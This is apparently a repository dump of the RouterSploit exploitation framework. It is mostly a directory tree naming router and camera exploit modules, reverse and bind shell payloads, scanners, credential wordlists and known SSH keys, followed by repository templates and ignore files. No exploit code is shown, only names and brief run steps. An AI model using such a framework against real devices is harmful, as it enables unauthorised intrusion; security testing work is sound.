│ │ │ │ ├── dir_825_path_traversal.py
│ │ │ │ ├── dir_850l_creds_disclosure.py
│ │ │ │ ├── dir_8xx_password_disclosure.py
│ │ │ │ ├── dns_320l_327l_rce.py
│ │ │ │ ├── dsl_2640b_dns_change.py
│ │ │ │ ├── dsl_2730_2750_path_traversal.py
│ │ │ │ ├── dsl_2730b_2780b_526b_dns_change.py
│ │ │ │ ├── dsl_2740r_dns_change.py
│ │ │ │ ├── dsl_2750b_info_disclosure.py
│ │ │ │ ├── dsl_2750b_rce.py
│ │ │ │ ├── dsp_w110_rce.py
│ │ │ │ ├── dvg_n5402sp_path_traversal.py
│ │ │ │ ├── dwl_3200ap_password_disclosure.py
│ │ │ │ ├── dwr_932_info_disclosure.py
│ │ │ │ ├── dwr_932b_backdoor.py
│ │ │ │ ├── multi_hedwig_cgi_exec.py
│ │ │ │ └── multi_hnap_rce.py
│ │ │ ├── fortinet/
│ │ │ │ ├── __init__.py
│ │ │ │ └── fortigate_os_backdoor.py
│ │ │ ├── huawei/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── e5331_mifi_info_disclosure.py
│ │ │ │ ├── hg520_info_disclosure.py
│ │ │ │ ├── hg530_hg520b_password_disclosure.py
│ │ │ │ ├── hg532_rce.py
│ │ │ │ └── hg866_password_change.py
│ │ │ ├── ipfire/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ipfire_oinkcode_rce.py
│ │ │ │ ├── ipfire_proxy_rce.py
│ │ │ │ └── ipfire_shellshock.py
│ │ │ ├── lg/
│ │ │ │ ├── __init__.py
│ │ │ │ └── nas_3718.py
│ │ │ ├── linksys/
│ │ │ │ ├── 1500_2500_rce.py
│ │ │ │ ├── __init__.py
│ │ │ │ ├── eseries_themoon_rce.py
│ │ │ │ ├── smartwifi_password_disclosure.py
│ │ │ │ ├── wap54gv3_rce.py
│ │ │ │ └── wrt100_110_rce.py
│ │ │ ├── mikrotik/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── routeros_jailbreak.py
│ │ │ │ └── winbox_auth_bypass_creds_disclosure.py
│ │ │ ├── movistar/
│ │ │ │ ├── __init__.py
│ │ │ │ └── adsl_router_bhs_rta_path_traversal.py
│ │ │ ├── multi/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── gpon_home_gateway_rce.py
│ │ │ │ ├── misfortune_cookie.py
│ │ │ │ ├── rom0.py
│ │ │ │ ├── tcp_32764_info_disclosure.py
│ │ │ │ └── tcp_32764_rce.py
│ │ │ ├── netcore/
│ │ │ │ ├── __init__.py
│ │ │ │ └── udp_53413_rce.py
│ │ │ ├── netgear/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── dgn2200_dnslookup_cgi_rce.py
│ │ │ │ ├── dgn2200_ping_cgi_rce.py
│ │ │ │ ├── jnr1010_path_traversal.py
│ │ │ │ ├── multi_password_disclosure-2017-5521.py
│ │ │ │ ├── multi_rce.py
│ │ │ │ ├── n300_auth_bypass.py
│ │ │ │ ├── prosafe_rce.py
│ │ │ │ ├── r7000_r6400_rce.py
│ │ │ │ ├── rax30_rce.py
│ │ │ │ └── wnr500_612v3_jnr1010_2010_path_traversal.py
│ │ │ ├── netsys/
│ │ │ │ ├── __init__.py
│ │ │ │ └── multi_rce.py
│ │ │ ├── shuttle/
│ │ │ │ ├── 915wm_dns_change.py
│ │ │ │ └── __init__.py
│ │ │ ├── technicolor/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── dwg855_authbypass.py
│ │ │ │ ├── tc7200_password_disclosure.py
│ │ │ │ ├── tc7200_password_disclosure_v2.py
│ │ │ │ └── tg784_authbypass.py
│ │ │ ├── thomson/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── twg849_info_disclosure.py
│ │ │ │ └── twg850_password_disclosure.py
│ │ │ ├── tplink/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── archer_c2_c20i_rce.py
│ │ │ │ ├── archer_c9_admin_password_reset.py
│ │ │ │ ├── wdr740nd_wdr740n_backdoor.py
│ │ │ │ ├── wdr740nd_wdr740n_path_traversal.py
│ │ │ │ └── wdr842nd_wdr842n_configure_disclosure.py
│ │ │ ├── ubiquiti/
│ │ │ │ ├── __init__.py
│ │ │ │ └── airos_6_x.py
│ │ │ ├── zte/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── f460_f660_backdoor.py
│ │ │ │ ├── zxhn_h108n_wifi_password_disclosure.py
│ │ │ │ └── zxv10_rce.py
│ │ │ └── zyxel/
│ │ │ ├── __init__.py
│ │ │ ├── d1000_rce.py
│ │ │ ├── d1000_wifi_password_disclosure.py
│ │ │ ├── p660hn_t_v1_rce.py
│ │ │ ├── p660hn_t_v2_rce.py
│ │ │ └── zywall_usg_extract_hashes.py
│ │ ├── generic/
│ │ │ ├── __init__.py
│ │ │ ├── bluetooth/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── btle_enumerate.py
│ │ │ │ ├── btle_scan.py
│ │ │ │ └── btle_write.py
│ │ │ └── upnp/
│ │ │ ├── __init__.py
│ │ │ └── ssdp_msearch.py
│ │ ├── payloads/
│ │ │ ├── __init__.py
│ │ │ ├── armle/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── bind_tcp.py
│ │ │ │ └── reverse_tcp.py
│ │ │ ├── cmd/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── awk_bind_tcp.py
│ │ │ │ ├── awk_bind_udp.py
│ │ │ │ ├── awk_reverse_tcp.py
│ │ │ │ ├── bash_reverse_tcp.py
│ │ │ │ ├── netcat_bind_tcp.py
│ │ │ │ ├── netcat_reverse_tcp.py
│ │ │ │ ├── perl_bind_tcp.py
│ │ │ │ ├── perl_reverse_tcp.py
│ │ │ │ ├── php_bind_tcp.py
│ │ │ │ ├── php_reverse_tcp.py
│ │ │ │ ├── python_bind_tcp.py
│ │ │ │ ├── python_bind_udp.py
│ │ │ │ ├── python_reverse_tcp.py
│ │ │ │ └── python_reverse_udp.py
│ │ │ ├── mipsbe/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── bind_tcp.py
│ │ │ │ └── reverse_tcp.py
│ │ │ ├── mipsle/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── bind_tcp.py
│ │ │ │ └── reverse_tcp.py
│ │ │ ├── perl/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── bind_tcp.py
│ │ │ │ └── reverse_tcp.py
│ │ │ ├── php/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── bind_tcp.py
│ │ │ │ └── reverse_tcp.py
│ │ │ ├── python/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── bind_tcp.py
│ │ │ │ ├── bind_udp.py
│ │ │ │ ├── reverse_tcp.py
│ │ │ │ └── reverse_udp.py
│ │ │ ├── x64/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── bind_tcp.py
│ │ │ │ └── reverse_tcp.py
│ │ │ └── x86/
│ │ │ ├── __init__.py
│ │ │ ├── bind_tcp.py
│ │ │ └── reverse_tcp.py
│ │ └── scanners/
│ │ ├── __init__.py
│ │ ├── autopwn.py
│ │ ├── cameras/
│ │ │ ├── __init__.py
│ │ │ └── camera_scan.py
│ │ ├── misc/
│ │ │ ├── __init__.py
│ │ │ └── misc_scan.py
│ │ └── routers/
│ │ ├── __init__.py
│ │ └── router_scan.py
│ └── resources/
│ ├── __init__.py
│ ├── ssh_keys/
│ │ ├── array-networks-vapv-vxag.json
│ │ ├── array-networks-vapv-vxag.key
│ │ ├── barracuda_load_balancer_vm.json
│ │ ├── barracuda_load_balancer_vm.key
│ │ ├── ceragon-fibeair-cve-2015-0936.json
│ │ ├── ceragon-fibeair-cve-2015-0936.key
│ │ ├── exagrid-cve-2016-1561.json
│ │ ├── exagrid-cve-2016-1561.key
│ │ ├── f5-bigip-cve-2012-1493.json
│ │ ├── f5-bigip-cve-2012-1493.key
│ │ ├── loadbalancer.org-enterprise-va.json
│ │ ├── loadbalancer.org-enterprise-va.key
│ │ ├── monroe-dasdec-cve-2013-0137.json
│ │ ├── monroe-dasdec-cve-2013-0137.key
│ │ ├── quantum-dxi-v1000.json
│ │ ├── quantum-dxi-v1000.key
│ │ ├── vagrant.json
│ │ └── vagrant.key
│ └── wordlists/
│ ├── __init__.py
│ ├── defaults.txt
│ ├── passwords.txt
│ ├── snmp.txt
│ └── usernames.txt
├── rsf.py
├── setup.py
└── tests/
├── __init__.py
├── conftest.py
├── core/
│ ├── __init__.py
│ └── test_option.py
├── creds/
│ ├── __init__.py
│ ├── cameras/
│ │ ├── __init__.py
│ │ ├── acti/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ ├── test_telnet_default_creds.py
│ │ │ └── test_webinterface_default_creds.py
│ │ ├── american_dynamics/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── arecont/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── avigilon/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── avtech/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── axis/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ ├── test_telnet_default_creds.py
│ │ │ └── test_webinterface_http_auth_default_creds.py
│ │ ├── basler/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ ├── test_telnet_default_creds.py
│ │ │ └── test_webinterface_default_creds.py
│ │ ├── brickcom/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ ├── test_telnet_default_creds.py
│ │ │ └── test_webinterface_http_auth_default_creds.py
│ │ ├── canon/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ ├── test_telnet_default_creds.py
│ │ │ └── test_webinterface_default_creds.py
│ │ ├── cisco/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── dlink/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── geovision/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── grandstream/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── hikvision/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── honeywell/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── iqinvision/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── jvc/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── mobotix/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── samsung/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── sentry360/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── siemens/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── speco/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── stardot/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ ├── vacron/
│ │ │ ├── __init__.py
│ │ │ ├── test_ftp_default_creds.py
│ │ │ ├── test_ssh_default_creds.py
│ │ │ └── test_telnet_default_creds.py
│ │ └── videoiq/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── generic/
│ │ ├── test_ftp_bruteforce.py
│ │ ├── test_ftp_default.py
│ │ ├── test_http_basic_digest_bruteforce.py
│ │ ├── test_http_basic_digest_default.py
│ │ ├── test_snmp_bruteforce.py
│ │ ├── test_ssh_bruteforce.py
│ │ ├── test_ssh_default.py
│ │ ├── test_telnet_bruteforce.py
│ │ └── test_telnet_default.py
│ └── routers/
│ ├── 2wire/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── 3com/
│ │ ├── __init__.py
│ │ ├── test_3com_ftp_default_creds.py
│ │ ├── test_3com_ssh_default_creds.py
│ │ └── test_3com_telnet_default_creds.py
│ ├── __init__.py
│ ├── asmax/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ ├── test_telnet_default_creds.py
│ │ └── test_webinterface_http_auth_default_creds.py
│ ├── asus/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── belkin/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── bhu/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── billion/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── cisco/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── comtrend/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── dlink/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── fortinet/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── huawei/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── ipfire/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── juniper/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── linksys/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── mikrotik/
│ │ ├── __init__.py
│ │ ├── test_api_ros_default_creds.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── movistar/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── netcore/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── netgear/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── netsys/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── pfsense/
│ │ ├── __init__.py
│ │ └── test_ssh_default_creds.py
│ ├── technicolor/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── thomson/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── tplink/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── ubiquiti/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ ├── zte/
│ │ ├── __init__.py
│ │ ├── test_ftp_default_creds.py
│ │ ├── test_ssh_default_creds.py
│ │ └── test_telnet_default_creds.py
│ └── zyxel/
│ ├── __init__.py
│ ├── test_ftp_default_creds.py
│ ├── test_ssh_default_creds.py
│ └── test_telnet_default_creds.py
├── encoders/
│ ├── __init__.py
│ ├── perl/
│ │ ├── __init__.py
│ │ ├── test_base64.py
│ │ └── test_hex.py
│ ├── php/
│ │ ├── __init__.py
│ │ ├── test_base64.py
│ │ └── test_hex.py
│ └── python/
│ ├── __init__.py
│ ├── test_base64.py
│ └── test_hex.py
├── exploits/
│ ├── __init__.py
│ ├── cameras/
│ │ ├── __init__.py
│ │ ├── avigilon/
│ │ │ ├── __init__.py
│ │ │ └── test_videoiq_camera_path_traversal.py
│ │ ├── brickcom/
│ │ │ ├── __init__.py
│ │ │ ├── test_corp_network_cameras_conf_disclosure.py
│ │ │ └── test_users_cgi_creds_disclosure.py
│ │ ├── cisco/
│ │ │ ├── __init__.py
│ │ │ └── test_video_surv_path_traversal.py
│ │ ├── dlink/
│ │ │ ├── __init__.py
│ │ │ └── test_dcs_930l_932l_auth_bypass.py
│ │ ├── honeywell/
│ │ │ ├── __init__.py
│ │ │ └── test_hicc_1100pt_password_disclosure.py
│ │ ├── jovision/
│ │ │ ├── __init__.py
│ │ │ └── test_jovision_camera_credential_disclosure.py
│ │ ├── multi/
│ │ │ ├── __init__.py
│ │ │ ├── test_cctv_dvr_rce.py
│ │ │ ├── test_dvr_creds_disclosure.py
│ │ │ ├── test_jvc_vanderbilt_honeywell_path_traversal.py
│ │ │ └── test_netwave_ip_camera_information_disclosure.py
│ │ ├── mvpower/
│ │ │ ├── __init__.py
│ │ │ └── test_dvr_jaws_rce.py
│ │ ├── siemens/
│ │ │ ├── __init__.py
│ │ │ └── test_cvms2025_credentials_disclosure.py
│ │ └── xiongmai/
│ │ ├── __init__.py
│ │ └── test_uc_httpd_path_traversal.py
│ ├── misc/
│ │ ├── __init__.py
│ │ ├── asus/
│ │ │ └── test_b1m_projector_rce.py
│ │ ├── miele/
│ │ │ ├── __init__.py
│ │ │ └── test_pg8528_path_traversal.py
│ │ └── wepresent/
│ │ ├── __init__.py
│ │ └── test_wipg1000_rce.py
│ └── routers/
│ ├── 2wire/
│ │ ├── __init__.py
│ │ ├── test_4011g_5012nv_path_traversal.py
│ │ └── test_gateway_auth_bypass.py
│ ├── 3com/
│ │ ├── __init__.py
│ │ ├── test_ap8760_password_disclosure.py
│ │ ├── test_imc_info_disclosure.py
│ │ ├── test_imc_path_traversal.py
│ │ ├── test_officeconnect_info_disclosure.py
│ │ └── test_officeconnect_rce.py
│ ├── __init__.py
│ ├── asmax/
│ │ ├── __init__.py
│ │ ├── test_ar_1004g_password_disclosure.py
│ │ └── test_ar_804_gu_rce.py
│ ├── asus/
│ │ ├── __init__.py
│ │ ├── test_asuswrt_lan_rce.py
│ │ ├── test_infosvr_backdoor_rce.py
│ │ └── test_rt_n16_password_disclosure.py
│ ├── belkin/
│ │ ├── __init__.py
│ │ ├── test_auth_bypass.py
│ │ ├── test_g_n150_password_disclosure.py
│ │ ├── test_g_plus_info_disclosure.py
│ │ ├── test_n150_path_traversal.py
│ │ ├── test_n750_rce.py
│ │ └── test_play_mac_prce.py
│ ├── bhu/
│ │ ├── __init__.py
│ │ └── test_bhu_urouter_rce.py
│ ├── billion/
│ │ ├── __init__.py
│ │ ├── test_billion_5200w_rce.py
│ │ └── test_billion_7700n4_password_disclosure.py
│ ├── cisco/
│ │ ├── __init__.py
│ │ ├── test_dpc2420_info_disclosure.py
│ │ ├── test_firepower_management60_path_traversal.py
│ │ ├── test_firepower_management60_rce.py
│ │ ├── test_ios_http_authorization_bypass.py
│ │ ├── test_rv320_command_injection.py
│ │ ├── test_secure_acs_bypass.py
│ │ ├── test_ucm_info_disclosure.py
│ │ ├── test_ucs_manager_rce.py
│ │ └── test_unified_multi_path_traversal.py
│ ├── comtrend/
│ │ ├── __init__.py
│ │ └── test_ct_5361t_password_disclosure.py
│ ├── dlink/
│ │ ├── __init__.py
│ │ ├── test_dcs_930l_auth_rce.py
│ │ ├── test_dir_300_320_600_615_info_disclosure.py
│ │ ├── test_dir_300_320_615_auth_bypass.py
│ │ ├── test_dir_300_600_rce.py
│ │ ├── test_dir_300_645_815_upnp_rce.py
│ │ ├── test_dir_645_815_rce.py
│ │ ├── test_dir_645_password_disclosure.py
│ │ ├── test_dir_655_866_652_rce.py
│ │ ├── test_dir_815_850l_rce.py
│ │ ├── test_dir_825_path_traversal.py
│ │ ├── test_dir_850l_creds_disclosure.py
│ │ ├── test_dir_8xx_password_disclosure.py
│ │ ├── test_dns_320l_327l_rce.py
│ │ ├── test_dsl_2730_2750_path_traversal.py
│ │ ├── test_dsl_2730b_2780b_526b_dns_change.py
│ │ ├── test_dsl_2750b_info_disclosure.py
│ │ ├── test_dsl_2750b_rce.py
│ │ ├── test_dsp_w110_rce.py
│ │ ├── test_dvg_n5402sp_path_traversal.py
│ │ ├── test_dwl_3200ap_password_disclosure.py
│ │ ├── test_dwr_932_info_disclosure.py
│ │ ├── test_dwr_932b_backdoor.py
│ │ ├── test_multi_hedwig_cgi_exec.py
│ │ └── test_multi_hnap_rce.py
│ ├── huawei/
│ │ ├── __init__.py
│ │ ├── test_e5331_mifi_info_disclosure.py
│ │ ├── test_hg520_info_disclosure.py
│ │ ├── test_hg530_hg520b_password_disclosure.py
│ │ └── test_hg866_password_change.py
│ ├── ipfire/
│ │ ├── __init__.py
│ │ ├── test_ipfire_proxy_rce.py
│ │ └── test_ipfire_shellshock.py
│ ├── linksys/
│ │ ├── __init__.py
│ │ ├── test_1500_2500_rce.py
│ │ ├── test_eseries_themoon_rce.py
│ │ ├── test_smartwifi_password_disclosure.py
│ │ ├── test_wap54gv3_rce.py
│ │ └── test_wrt100_110_rce.py
│ ├── mikrotik/
│ │ ├── __init__.py
│ │ └── test_winbox_auth_bypass_creds_disclosure.py
│ ├── movistar/
│ │ ├── __init__.py
│ │ └── test_adsl_router_bhs_rta_path_traversal.py
│ ├── multi/
│ │ ├── __init__.py
│ │ ├── test_gpon_home_gateway_rce.py
│ │ ├── test_misfortune_cookie.py
│ │ ├── test_rom0.py
│ │ ├── test_tcp_32764_info_disclosure.py
│ │ └── test_tcp_32764_rce.py
│ ├── netcore/
│ │ ├── __init__.py
│ │ └── test_udp_53413_rce.py
│ ├── netgear/
│ │ ├── __init__.py
│ │ ├── test_dgn2200_ping_cgi_rce.py
│ │ ├── test_jnr1010_path_traversal.py
│ │ ├── test_n300_auth_bypass.py
│ │ ├── test_netgear_multi_rce.py
│ │ ├── test_prosafe_rce.py
│ │ ├── test_r7000_r6400_rce.py
│ │ └── test_wnr500_612v3_jnr1010_2010_path_traversal.py
│ ├── netsys/
│ │ ├── __init__.py
│ │ └── test_multi_rce.py
│ ├── shuttle/
│ │ ├── __init__.py
│ │ └── test_915wm_dns_change.py
│ ├── technicolor/
│ │ ├── __init__.py
│ │ ├── test_dwg855_authbypass.py
│ │ ├── test_tc7200_password_disclosure.py
│ │ ├── test_tc7200_password_disclosure_v2.py
│ │ └── test_tg784_authbypass.py
│ ├── thomson/
│ │ ├── __init__.py
│ │ └── test_twg850_password_disclosure.py
│ ├── tplink/
│ │ ├── __init__.py
│ │ ├── test_archer_c2_c20i_rce.py
│ │ ├── test_wdr740nd_wdr740n_backdoor.py
│ │ ├── test_wdr740nd_wdr740n_path_traversal.py
│ │ └── test_wdr842nd_wdr842n_configure_disclosure.py
│ ├── zte/
│ │ ├── __init__.py
│ │ ├── test_f460_f660_backdoor.py
│ │ ├── test_zxhn_h108n_wifi_password_disclosure.py
│ │ └── test_zxv10_rce.py
│ └── zyxel/
│ ├── __init__.py
│ ├── test_d1000_rce.py
│ ├── test_d1000_wifi_password_disclosure.py
│ ├── test_p660hn_t_v1_rce.py
│ ├── test_p660hn_t_v2_rce.py
│ └── test_zywall_usg_extract_hashes.py
├── generic/
│ ├── __init__.py
│ └── upnp/
│ └── test_ssdp_msearch.py
├── payloads/
│ ├── __init__.py
│ ├── armle/
│ │ ├── __init__.py
│ │ ├── test_bind_tcp.py
│ │ └── test_reverse_tcp.py
│ ├── cmd/
│ │ ├── __init__.py
│ │ ├── test_awk_bind_tcp.py
│ │ ├── test_awk_bind_udp.py
│ │ ├── test_awk_reverse_tcp.py
│ │ ├── test_bash_reverse_tcp.py
│ │ ├── test_netcat_bind_tcp.py
│ │ ├── test_netcat_reverse_tcp.py
│ │ ├── test_perl_bind_tcp.py
│ │ ├── test_perl_reverse_tcp.py
│ │ ├── test_php_bind_tcp.py
│ │ ├── test_php_reverse_tcp.py
│ │ ├── test_python_bind_tcp.py
│ │ ├── test_python_bind_udp.py
│ │ ├── test_python_reverse_tcp.py
│ │ └── test_python_reverse_udp.py
│ ├── mipsbe/
│ │ ├── __init__.py
│ │ ├── test_bind_tcp.py
│ │ └── test_reverse_tcp.py
│ ├── mipsle/
│ │ ├── __init__.py
│ │ ├── test_bind_tcp.py
│ │ └── test_reverse_tcp.py
│ ├── perl/
│ │ ├── test_bind_tcp.py
│ │ └── test_reverse_tcp.py
│ ├── php/
│ │ ├── __init__.py
│ │ ├── test_bind_tcp.py
│ │ └── test_reverse_tcp.py
│ ├── python/
│ │ ├── __init__.py
│ │ ├── test_bind_tcp.py
│ │ ├── test_bind_udp.py
│ │ ├── test_reverse_tcp.py
│ │ └── test_reverse_udp.py
│ ├── x64/
│ │ ├── __init__.py
│ │ ├── test_bind_tcp.py
│ │ └── test_reverse_tcp.py
│ └── x86/
│ ├── __init__.py
│ ├── test_bind_tcp.py
│ └── test_reverse_tcp.py
├── test_exploit_scenarios.py
└── test_module_info.py
================================================
FILE CONTENTS
================================================
================================================
FILE: .dockerignore
================================================
.idea/
.travis/
README.md
LICENSE
.travis.yml
*.pyc
*.log
================================================
FILE: .github/ISSUE_TEMPLATE.md
================================================
! ANY INCOMPLETE REPORT WILL BE CLOSED RIGHT AWAY !
## Steps to Reproduce (for bugs)
1.
2.
3.
4.
## Your Environment
* RouterSploit Version used:
* Operating System and version:
* Python Version: ( `python3 --version` )
* Python Environment: ( `python3 -m pip freeze` )
## Current Behavior
* If describing a bug, tell us what happens instead of the expected behavior
* If suggesting a change/improvement, tell us how it works right now
## Expected Behavior
* If you're describing a bug, tell us what should happen
* If you're suggesting a change/improvement, tell us how it should work
================================================
FILE: .github/PULL_REQUEST_TEMPLATE.md
================================================
## Status
**READY/IN DEVELOPMENT/HOLD**
## Description
Describe what is changed by your Pull Request. If this PR is related to the open issue (bug/feature/new module) please attach issue number.
## Verification
Provide steps to test or reproduce the PR.
1. Start `./rsf.py`
2. `use exploits/routers/dlink/dsl_2750b_rce`
3. `set target 192.168.1.1`
4. `run`
5. ...
## Checklist
- [ ] Write module/feature
- [ ] Write tests ([Example](https://github.com/threat9/routersploit/blob/master/tests/exploits/routers/dlink/test_dsl_2750b_rce.py))
- [ ] Document how it works ([Example](https://github.com/threat9/routersploit/blob/master/docs/modules/exploits/routers/dlink/dsl_2750b_rce.md))
================================================
FILE: .gitignore
================================================
# IntelliJ project files
.idea
out
gen
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
*$py.class
# C extensions
*.so
# Distribution / packaging
.Python
env/
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib64/
parts/
sdist/
var/
*.egg-info/
.installed.cfg
*.egg
# PyInstaller
# Usually these files are written by a python script from a template
# before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest
*.spec
# Installer logs
pip-log.txt
pip-delete-this-directory.txt
# Unit test / coverage reports
htmlcov/
.tox/
.coverage
.coverage.*
.cache
.pytest_cache
nosetests.xml
coverage.xml
*,cover
# Translations
*.mo
*.pot
# Django stuff:
*.log
# Sphinx documentation
docs/_build/
